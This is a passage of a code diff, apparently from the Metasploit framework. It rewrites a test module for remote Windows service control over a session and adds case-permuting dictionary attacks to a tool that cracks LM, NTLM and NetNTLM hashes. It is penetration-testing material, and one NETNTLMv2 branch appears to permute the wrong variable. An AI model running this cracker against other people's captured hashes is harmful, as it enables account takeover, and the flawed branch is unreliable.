print_status("TESTING service_list_running") - results = service_list_running - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - - print_status() - print_status("TESTING service_info on servicename: #{datastore["QSERVICE"]}") - results = service_info(datastore['QSERVICE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - - print_status() - print_status("TESTING service_query_ex on servicename: #{datastore["QSERVICE"]}") - results = service_query_ex(datastore['QSERVICE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - - print_status() - print_status("TESTING service_query_config on servicename: #{datastore["QSERVICE"]}") - results = service_query_config(datastore['QSERVICE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - - print_status() - print_status("TESTING service_change_startup on servicename: #{datastore['QSERVICE']} " + - "to #{datastore['MODE']}") - results = service_change_startup(datastore['QSERVICE'],datastore['MODE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - print_status("Current status of this service " + - "#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab - - print_status() - print_status("TESTING service_create on servicename: #{datastore['NSERVICE']} using\n" + - "display_name: #{datastore['DNAME']}, executable_on_host: " + - "#{datastore['BINPATH']}, and startupmode: #{datastore['MODE']}") - results = service_create(datastore['NSERVICE'],datastore['DNAME'],datastore['BINPATH'],datastore['MODE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - print_status("Current status of this service " + - "#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab - - print_status() - print_status("TESTING service_start on servicename: #{datastore['SSERVICE']}") - results = service_start(datastore['SSERVICE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - print_status("Current status of this service " + - "#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab - print_status("Sleeping to give the service a chance to start") - select(nil, nil, nil, 2) # give the service time to start, reduces false negatives - - print_status() - print_status("TESTING service_stop on servicename: #{datastore['SSERVICE']}") - results = service_stop(datastore['SSERVICE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - print_status("Current status of this service " + - "#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab - - print_status() - print_status("TESTING service_delete on servicename: #{datastore['NSERVICE']}") - results = service_delete(datastore['NSERVICE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - print_status("Current status of this service " + - "#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab - print_status() - print_status("Testing complete.") - end - -end +# +# by kernelsmith (kernelsmith+\x40+kernelsmith+\.com) +# + +require 'msf/core' +require 'rex' +require 'msf/core/post/windows/services' + +class Metasploit3 < Msf::Post + + include Msf::Post::Windows::Services + + include Msf::ModuleTest::PostTest + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Test Post::Windows::Services', + 'Description' => %q{ This module will test windows services methods within a shell}, + 'License' => MSF_LICENSE, + 'Author' => [ 'kernelsmith', 'egypt' ], + 'Version' => '$Revision: 11663 $', + 'Platform' => [ 'windows' ], + 'SessionTypes' => [ 'meterpreter', 'shell' ] + )) + register_options( + [ + OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]), + OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]), + OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]), + OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]), + OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]), + OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto", + ["auto", "manual", "disable"] + ]), + ], self.class) + + end + + def test_start + it "should start #{datastore["SSERVICE"]}" do + ret = true + results = service_start(datastore['SSERVICE']) + if results != 0 + # Failed the first time, try to stop it first, then try again + service_stop(datastore['SSERVICE']) + results = service_start(datastore['SSERVICE']) + end + ret &&= (results == 0) + + ret + end + it "should stop #{datastore["SSERVICE"]}" do + ret = true + results = service_stop(datastore['SSERVICE']) + ret &&= (results == 0) + + ret + end + end + + def test_list + it "should list services" do + ret = true + results = service_list + + ret &&= results.kind_of? Array + ret &&= results.length > 0 + ret &&= results.include? datastore["QSERVICE"] + + ret + end + end + + def test_info + it "should return info on a given service" do + ret = true + results = service_info(datastore['QSERVICE']) + + ret &&= results.kind_of? Hash + if ret + ret &&= results.has_key? "Name" + ret &&= (results["Name"] == "Windows Management Instrumentation") + ret &&= results.has_key? "Startup" + ret &&= results.has_key? "Command" + ret &&= results.has_key? "Credentials" + end + + ret + end + end + + def test_create + it "should create a service" do + mode = case datastore["MODE"] + when "disable"; 4 + when "manual"; 3 + when "auto"; 2 + else; 2 + end + ret = service_create(datastore['NSERVICE'],datastore['DNAME'],datastore['BINPATH'],mode) + + ret + end + + it "should return info on the newly-created service" do + ret = true + results = service_info(datastore['NSERVICE']) + + ret &&= results.kind_of? Hash + ret &&= results.has_key? "Name" + ret &&= (results["Name"] == datastore["DNAME"]) + ret &&= results.has_key? "Startup" + ret &&= (results["Startup"].downcase == datastore["MODE"]) + ret &&= results.has_key? "Command" + ret &&= results.has_key? "Credentials" + + ret + end + + it "should delete the new service" do + ret = service_delete(datastore['NSERVICE']) + + ret + end + end + + +=begin + def run + blab = datastore['VERBOSE'] + print_status("Running against session #{datastore["SESSION"]}") + print_status("Session type is #{session.type}") + print_status("Verbosity is set to #{blab.to_s}") + print_status("Don't be surprised to see some errors as the script is faster") + print_line("than the windows SCM, just make sure the errors are sane. You can") + print_line("set VERBOSE to true to see more details") + + print_status() + print_status("TESTING service_query_ex on servicename: #{datastore["QSERVICE"]}") + results = service_query_ex(datastore['QSERVICE']) + print_status("RESULTS: #{results.class} #{results.pretty_inspect}") + + print_status() + print_status("TESTING service_query_config on servicename: #{datastore["QSERVICE"]}") + results = service_query_config(datastore['QSERVICE']) + print_status("RESULTS: #{results.class} #{results.pretty_inspect}") + + print_status() + print_status("TESTING service_change_startup on servicename: #{datastore['QSERVICE']} " + + "to #{datastore['MODE']}") + results = service_change_startup(datastore['QSERVICE'],datastore['MODE']) + print_status("RESULTS: #{results.class} #{results.pretty_inspect}") + print_status("Current status of this service " + + "#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab + + print_status() + print_status("TESTING service_start on servicename: #{datastore['SSERVICE']}") + results = service_start(datastore['SSERVICE']) + print_status("RESULTS: #{results.class} #{results.pretty_inspect}") + print_status("Current status of this service " + + "#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab + print_status("Sleeping to give the service a chance to start") + select(nil, nil, nil, 2) # give the service time to start, reduces false negatives + + print_status() + print_status("TESTING service_stop on servicename: #{datastore['SSERVICE']}") + results = service_stop(datastore['SSERVICE']) + print_status("RESULTS: #{results.class} #{results.pretty_inspect}") + print_status("Current status of this service " + + "#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab + + print_status() + print_status("TESTING service_delete on servicename: #{datastore['NSERVICE']}") + results = service_delete(datastore['NSERVICE']) + print_status("RESULTS: #{results.class} #{results.pretty_inspect}") + print_status("Current status of this service " + + "#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab + print_status() + print_status("Testing complete.") + end +=end + +end diff --git a/tools/lm2ntcrack.rb b/tools/lm2ntcrack.rb index e5c5e163a3..9bd1893e42 100755 --- a/tools/lm2ntcrack.rb +++ b/tools/lm2ntcrack.rb @@ -37,6 +37,27 @@ def usage exit end +def permute_pw(pw) + # fast permutation from http://stackoverflow.com/a/1398900 + perms = [""] + if pw.nil? + return perms + end + tail = pw.downcase + while tail.length > 0 do + head, tail, psize = tail[0..0], tail[1..-1], perms.size + hu = head.upcase + for i in (0...psize) + tp = perms[i] + perms[i] = tp + hu + if hu != head + perms.push(tp + head) + end + end + end + return perms +end + type = hash = pass = srvchal = clichal = calculatedhash = list = user = domain = nil $args = Rex::Parser::Arguments.new( @@ -128,8 +149,6 @@ when "HALFLM" $stderr.puts "[*] HALFLM HASH must be exactly 16 bytes of hexadecimal" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') @@ -137,20 +156,14 @@ when "HALFLM" puts password calculatedhash = CRYPT::lm_hash(password,true).unpack("H*")[0].upcase if calculatedhash == hash.upcase - found = true - match_password = password - break + puts "[*] Correct password found : #{password.upcase}" + exit end end end end - if found - puts "[*] Correct password found : #{match_password.upcase}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not pass =~ /^.{0,7}$/ $stderr.puts "[*] LM password can not be bigger then 7 characters" @@ -185,8 +198,6 @@ when "LM" $stderr.puts "[*] LM HASH must be exactly 32 bytes of hexadecimal" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') @@ -194,20 +205,14 @@ when "LM" puts password calculatedhash = CRYPT::lm_hash(password.upcase).unpack("H*")[0].upcase if calculatedhash == hash.upcase - found = true - match_password = password - break + puts "[*] Correct password found : #{password.upcase}" + exit end end end end - if found - puts "[*] Correct password found : #{match_password.upcase}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not pass =~ /^.{0,14}$/ $stderr.puts "[*] LM password can not be bigger then 14 characters" @@ -242,27 +247,21 @@ when "NTLM" $stderr.puts "[*] NTLM HASH must be exactly 32 bytes of hexadecimal" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') - puts password - calculatedhash = CRYPT::ntlm_hash(password).unpack("H*")[0].upcase - if calculatedhash == hash.upcase - found = true - match_password = password - break + for permutedpw in permute_pw(password) + puts permutedpw + calculatedhash = CRYPT::ntlm_hash(permutedpw).unpack("H*")[0].upcase + if calculatedhash == hash.upcase + puts "[*] Correct password found : #{permutedpw}" + exit + end end end end - if found - puts "[*] Correct password found : #{match_password}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE calculatedhash = CRYPT::ntlm_hash(pass).unpack("H*")[0].upcase puts "[*] The NTLM hash for #{pass} is : #{calculatedhash}" @@ -272,14 +271,14 @@ when "NTLM" $stderr.puts "[*] NTLM HASH must be exactly 32 bytes of hexadecimal" exit end - calculatedhash = CRYPT::ntlm_hash(pass).unpack("H*")[0].upcase - if hash.upcase == calculatedhash - puts "[*] Correct password provided : #{pass}" - exit - else - puts "[*] Incorrect password provided : #{pass}" - exit + for permutedpw in permute_pw(pass) + calculatedhash = CRYPT::ntlm_hash(permutedpw).unpack("H*")[0].upcase + if hash.upcase == calculatedhash + puts "[*] Correct password provided : #{permutedpw}" + exit + end end + puts "[*] Incorrect password provided : #{pass}" end when "HALFNETLMv1" case mode @@ -296,8 +295,6 @@ when "HALFNETLMv1" $stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') @@ -308,20 +305,14 @@ when "HALFNETLMv1" :challenge => [ srvchal ].pack("H*") } calculatedhash = CRYPT::lm_response(arglm,true).unpack("H*")[0].upcase if calculatedhash == hash.upcase - found = true - match_password = password - break + puts "[*] Correct password found : #{password.upcase}" + exit end end end end - if found - puts "[*] Correct password found : #{match_password.upcase}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not pass =~ /^.{0,7}$/ $stderr.puts "[*] HALFNETLMv1 password can not be bigger then 7 characters" @@ -386,8 +377,6 @@ when "NETLMv1" $stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') @@ -397,20 +386,14 @@ when "NETLMv1" :challenge => [ srvchal ].pack("H*") } calculatedhash = CRYPT::lm_response(arglm).unpack("H*")[0].upcase if calculatedhash == hash.upcase - found = true - match_password = password - break + puts "[*] Correct password found : #{password.upcase}" + exit end end end end - if found - puts "[*] Correct password found : #{match_password.upcase}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not pass =~ /^.{1,14}$/ $stderr.puts "[*] NETLMv1 password can not be bigger then 14 characters" @@ -474,29 +457,23 @@ when "NETNTLMv1" $stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') - puts password - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password), - :challenge => [ srvchal ].pack("H*") } - calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase - if calculatedhash == hash.upcase - found = true - match_password = password - break + for permutedpw in permute_pw(password) + puts permutedpw + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(permutedpw), + :challenge => [ srvchal ].pack("H*") } + calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase + if calculatedhash == hash.upcase + puts "[*] Correct password found : #{permutedpw}" + exit + end end end end - if found - puts "[*] Correct password found : #{match_password}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not srvchal $stderr.puts "[*] Server challenge must be provided with this type" @@ -524,17 +501,18 @@ when "NETNTLMv1" $stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal" exit end - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), - :challenge => [ srvchal ].pack("H*") } + for permutedpw in permute_pw(pass) + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(permutedpw), + :challenge => [ srvchal ].pack("H*") } - calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase - if hash.upcase == calculatedhash - puts "[*] Correct password provided : #{pass}" - exit - else - puts "[*] Incorrect password provided : #{pass}" - exit + calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase + if hash.upcase == calculatedhash + puts "[*] Correct password provided : #{permutedpw}" + exit + end end + puts "[*] Incorrect password provided : #{pass}" + exit end when "NETNTLM2_SESSION" case mode @@ -560,32 +538,26 @@ when "NETNTLM2_SESSION" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') - puts password - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password), - :challenge => [ srvchal ].pack("H*") } - optntlm = { :client_challenge => [ clichal ].pack("H*")} + for permutedpw in permute_pw(password) + puts permutedpw + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(permutedpw), + :challenge => [ srvchal ].pack("H*") } + optntlm = { :client_challenge => [ clichal ].pack("H*")} - calculatedhash = CRYPT::ntlm2_session(argntlm,optntlm).join[24,24].unpack("H*")[0].upcase + calculatedhash = CRYPT::ntlm2_session(argntlm,optntlm).join[24,24].unpack("H*")[0].upcase - if calculatedhash == hash.upcase - found = true - match_password = password - break + if calculatedhash == hash.upcase + puts "[*] Correct password found : #{permutedpw}" + exit + end end end end - if found - puts "[*] Correct password found : #{match_password}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not srvchal $stderr.puts "[*] Server challenge must be provided with this type" @@ -631,19 +603,20 @@ when "NETNTLM2_SESSION" $stderr.puts "[*] Client challenge must be exactly 16 bytes of hexadecimal" exit end - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), - :challenge => [ srvchal ].pack("H*") } - optntlm = { :client_challenge => [ clichal ].pack("H*")} + for permutedpw in permute_pw(pass) + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(permutedpw), + :challenge => [ srvchal ].pack("H*") } + optntlm = { :client_challenge => [ clichal ].pack("H*")} - calculatedhash = CRYPT::ntlm2_session(argntlm,optntlm).join[24,24].unpack("H*")[0].upcase + calculatedhash = CRYPT::ntlm2_session(argntlm,optntlm).join[24,24].unpack("H*")[0].upcase - if hash.upcase == calculatedhash - puts "[*] Correct password provided : #{pass}" - exit - else - puts "[*] Incorrect password provided : #{pass}" - exit + if hash.upcase == calculatedhash + puts "[*] Correct password provided : #{permutedpw}" + exit + end end + puts "[*] Incorrect password provided : #{pass}" + exit end when "NETLMv2" case mode @@ -677,8 +650,6 @@ when "NETLMv2" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') @@ -688,19 +659,13 @@ when "NETLMv2" optlm = { :client_challenge => [ clichal ].pack("H*")} calculatedhash = CRYPT::lmv2_response(arglm, optlm).unpack("H*")[0].upcase if calculatedhash.slice(0,32) == hash.upcase - found = true - match_password = password - break + puts "[*] Correct password found : #{password}" + exit end end end - if found - puts "[*] Correct password found : #{match_password}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not srvchal $stderr.puts "[*] Server challenge must be provided with this type" @@ -808,31 +773,25 @@ when "NETNTLMv2" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') - puts password - argntlm = { :ntlmv2_hash => CRYPT::ntlmv2_hash(user, password, domain), - :challenge => [ srvchal ].pack("H*") } - optntlm = { :nt_client_challenge => [ clichal ].pack("H*")} - calculatedhash = CRYPT::ntlmv2_response(argntlm,optntlm).unpack("H*")[0].upcase + for permutedpw in permute_pw(password) + puts permutedpw + argntlm = { :ntlmv2_hash => CRYPT::ntlmv2_hash(user, permutedpw, domain), + :challenge => [ srvchal ].pack("H*") } + optntlm = { :nt_client_challenge => [ clichal ].pack("H*")} + calculatedhash = CRYPT::ntlmv2_response(argntlm,optntlm).unpack("H*")[0].upcase - if calculatedhash.slice(0,32) == hash.upcase - found = true - match_password = password - break + if calculatedhash.slice(0,32) == hash.upcase + puts "[*] Correct password found : #{password}" + exit + end end end end - if found - puts "[*] Correct password found : #{match_password}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not srvchal $stderr.puts "[*] Server challenge must be provided with this type" @@ -896,18 +855,19 @@ when "NETNTLMv2" exit end - argntlm = { :ntlmv2_hash => CRYPT::ntlmv2_hash(user, pass, domain), - :challenge => [ srvchal ].pack("H*") } - optntlm = { :nt_client_challenge => [ clichal ].pack("H*")} - calculatedhash = CRYPT::ntlmv2_response(argntlm,optntlm).unpack("H*")[0].upcase + for permutedpw in permute_pw(password) + argntlm = { :ntlmv2_hash => CRYPT::ntlmv2_hash(user, permutedpw, domain), + :challenge => [ srvchal ].pack("H*") } + optntlm = { :nt_client_challenge => [ clichal ].pack("H*")} + calculatedhash = CRYPT::ntlmv2_response(argntlm,optntlm).unpack("H*")[0].upcase - if hash.upcase == calculatedhash.slice(0,32) - puts "[*] Correct password provided : #{pass}" - exit - else - puts "[*] Incorrect password provided : #{pass}" - exit + if hash.upcase == calculatedhash.slice(0,32) + puts "[*] Correct password provided : #{permutedpw}" + exit + end end + puts "[*] Incorrect password provided : #{pass}" + exit end else $stderr.puts "type must be of type : HALFLM/LM/NTLM/HALFNETLMv1/NETLMv1/NETNTLMv1/NETNTLM2_SESSION/NETLMv2/NETNTLMv2"